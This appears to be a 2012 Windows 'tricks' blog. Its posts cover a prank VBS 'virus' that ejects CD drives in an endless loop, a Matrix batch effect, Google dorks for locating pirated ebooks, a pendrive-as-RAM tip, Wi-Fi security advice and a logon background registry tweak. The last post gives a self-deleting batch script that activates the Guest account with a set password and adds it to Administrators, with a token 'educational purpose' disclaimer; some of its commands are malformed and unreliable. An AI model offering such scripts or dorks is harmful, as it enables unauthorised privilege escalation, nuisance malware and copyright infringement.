Sunday, 8 April 2012



Create a Harmless Funny Virus with Notepad

Continuously eject CD/DVD drives

This VBS trick will create a code which will continuously eject all your connected Optical drives. If you put them back in, it will pop them out again. Copy this code and paste it in Notepad as Virus.vbs or *.vbs.

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Double click to open this file and you will be impressed by this awesome trick.

Matrix Falling Code Effect -

 Notepad CMD (.BAT) Tricks

Inspired by the movie Matrix, this falling code trick is extremely popular on social networking websites. Copy and paste the code given below in Notepad and save the file as "Matrix.bat" or *.bat. 


@echo off
color 02
:tricks
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto tricks

Using Google for searching ebooks


Google has some fantastic potential for you to find whatever you are after on the internet.

To search for a book / program / file perhaps try the following.

Go to Google's search page and use the following criteria in the search dialog

intitle:index.of? file extension Name of item

e.g. intitle:index.of? chm syngress

This will hopefully give you a listing of all websites that google has cached that contain references to files in CHM format that are published by SYNGRESS.

---------------
I use in Google

+("index of") +("/ebooks"|"/book") +(chm|pdf|zip|rar) +syngress

or

allinurl: +(rar|chm|zip|pdf|tgz) Syngress
Enjoy

Saturday, 7 April 2012


Using Pendrive As RAM



We've shown you how Windows Vista's/7's ReadyBoost feature 
will let you use a USB drive like this as extra cache 
memory to make your computer faster. Well there's a way 
to do the same trick in Windows XP. Thanks to Shawn in 
Quebec for sending along the tip.


First insert a flash drive


Open up the Control Panel.


Go to "System."


Choose the advanced Tab.


In the Performances section, click on "Settings."
Choose the advanced tab there.


In the "Virtual Memory" Section, press "Change."


Select the letter corresponding to your flash drive. 


(Hint: It's not C.) You can let the system manage the 
size or customize the amount of space that you want 
used as virtual memory. I'm not going to use this flash 
drive for anything else, so I'll let the system manage it.


Make sure to Press Set once you've made your choice.Press
 OK, and the changes will take effect.
Then restart your computer.
And now you have a little extra memory at no additional cost.

 Tips for Wireless Broadband & Modem Network Security 



1. Change Default Administrator Passwords (and Usernames) of Modem At the core of Wi-Fi home networks is an access point or router. To set up these pieces of equipment, there is a Web page (http://192.168.1.1). These Web tools are protected with a login screen (username and password) so that only the rightful owner can do this. However, for any given piece of equipment, the logins provided are simple and very well-known to hackers on the Internet. Change these settings immediately.


 2. Turn on (Compatible) WPA / WEP Encryption All Wi-Fi equipment supports some form of encryption. Encryption technology scrambles messages sent over wireless networks so that they cannot be easily read by humans. Several encryption technologies exist for Wi-Fi today. WEP is not exactly “good” encryption. With a freely available tool like “aircrack”, you can sniff wireless traffic protected by WEP and crack security on that network in a matter of minutes. WPA is the current, common encryption standard you should probably be using — though, of course, you should use something stronger as soon as it becomes available to you. Technology is advancing every day, on both sides of the encryption arms race, after all. For detail procedure go http://www.calcuttatelephones.com/dataoneinstall/menu.html and click on any wireless CPE provided by BSNL


 3. Change the Default SSID Access points and routers all use a network name called the SSID. Manufacturers normally ship their products with the same SSID set. True, knowing the SSID does not by itself allow your neighbors to break into your network, but it is a start. More importantly, when someone finds a default SSID, they see it is a poorly configured network and are much more likely to attack it. Change the default SSID immediately when configuring wireless security on your network.


 4. Enable MAC Address Filtering Each piece of Wi-Fi gear possesses a unique identifier called the physical address or MAC address. Access points and routers keep track of the MAC addresses of all devices that connect to them. Many such products offer the owner an option to key in the MAC addresses of their home equipment that restricts the network to only allow connections from those devices. Do this, but also know that the feature is not as powerful as it may seem. Hackers and their software programs can fake MAC addresses easily.


 5. Disable SSID Broadcast In Wi-Fi networking, the wireless access point or router typically broadcasts the network name (SSID) over the air at regular intervals. This feature was designed for businesses and mobile hotspots where Wi-Fi clients may roam in and out of range. In the home, this roaming feature is unnecessary, and it increases the likelihood someone will try to log in to your home network. Fortunately, most Wi-Fi access points allow the SSID broadcast feature to be disabled by the network administrator.



6. Do Not Auto-Connect to Open Wi-Fi Networks Connecting to an open Wi-Fi network such as a free wireless hotspot or your neighbor's router exposes your computer to security risks. Although not normally enabled, most computers have a setting available allowing these connections to happen automatically without notifying you (the user). This setting should not be enabled except in temporary situations.


 7. Assign Static IP Addresses to Devices Most home networkers gravitate toward using dynamic IP addresses. DHCP technology is indeed easy to set up. Unfortunately, this convenience also works to the advantage of network attackers, who can easily obtain valid IP addresses from your network's DHCP pool. Turn off DHCP on the router or access point, set a fixed IP address range instead, and then configure each connected device to match. Use a private IP address range (like 10.0.0.x) to prevent computers from being directly reached from the Internet.


 8. Enable Firewalls On Each Computer and the Router Modern network routers contain built-in firewall capability, but the option also exists to disable them. Ensure that your router's firewall is turned on. For extra protection, consider installing and running personal firewall software on each computer connected to the router.


 9. Position the Router or Access Point Safely Wi-Fi signals normally reach to the exterior of a home. A small amount of signal leakage outdoors is not a problem, but the further this signal reaches, the easier it is for others to detect and exploit. Wi-Fi signals often reach through neighboring homes and into streets, for example. When installing a wireless home network, the position of the access point or router determines its reach. Try to position these devices near the center of the home rather than near windows to minimize leakage.


 10.Turn Off the Network During Extended Periods of Non-Use The ultimate in wireless security measures, shutting down your network will most certainly prevent outside hackers from breaking in! While impractical to turn off and on the devices frequently, at least consider doing so during travel or extended periods offline. Computer disk drives have been known to suffer from power cycle wear-and-tear, but this is a secondary concern for broadband modems and routers. If you own a wireless router but are only using it wired (Ethernet) connections, you can also sometimes turn off Wi-Fi on a broadband router without powering down the entire network
If you face any problem regarding wireless security please contact concern DE (Internal).
*************************************

Monday, 2 April 2012

Change the logon screen background in Windows 7


How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well here is a step by step instruction to customize the logon screen background.




1. The image you need to set as the background should be a .jpg file and it’s size should not exceed 245KB.


2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or 1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your image. Once you’re done, save this image as backgroundDefault.jpg.


3. You will need to copy this image to


C:\Windows\system32\oobe\info\backgrounds
You will need to create that path if it does not already exist on your computer.


4. Now open the Registry Editor (Start -> Run -> Type regedit) and navigate to the following key


HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\
LogonUI\Background
If Background does not exist rightclick LogonUI, select New and then Key, and then name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and select New and then DWORD and name it OEMBackground.


5. Double-click on OEMBackground and set the Value Data to 1.


6. Now log-off to see the new logon screen background. If you would like to revert back to the default background, just set the Value Data back to 0.


I hope you like this trick. Just try out and give your feedback!

Sunday, 1 April 2012


Much Simpler trick to HACK admin from GUESTThis is a featured page


Well thats possible ..


Please Dont missuse This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.


HaCk "GUEST" with Admin privileges........



echo off
title Please wait...
cls

net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add

del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...